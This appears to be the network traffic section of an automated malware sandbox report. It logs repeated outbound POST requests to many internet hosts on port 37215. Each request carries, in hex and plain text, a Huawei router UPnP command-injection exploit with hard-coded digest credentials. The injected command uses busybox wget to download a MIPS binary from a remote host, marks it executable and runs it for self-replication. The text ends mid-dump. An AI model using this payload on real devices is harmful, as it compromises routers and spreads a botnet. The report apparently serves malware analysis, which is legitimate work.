                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2352192.168.2.1557942220.82.206.13637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.346169949 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2353192.168.2.154899241.120.39.14937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.346357107 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2354192.168.2.1537424222.171.199.12237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.346400976 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2355192.168.2.1533630197.159.219.17037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.351207972 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2356192.168.2.1545050157.29.13.13937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.351815939 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2357192.168.2.153761664.53.81.7037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.351840019 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2358192.168.2.1539928165.64.206.2737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.352134943 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2359192.168.2.153788888.195.241.17937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.352164984 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2360192.168.2.1540330205.33.173.22437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.352205992 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2361192.168.2.1546072197.68.184.13937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:30.352221012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 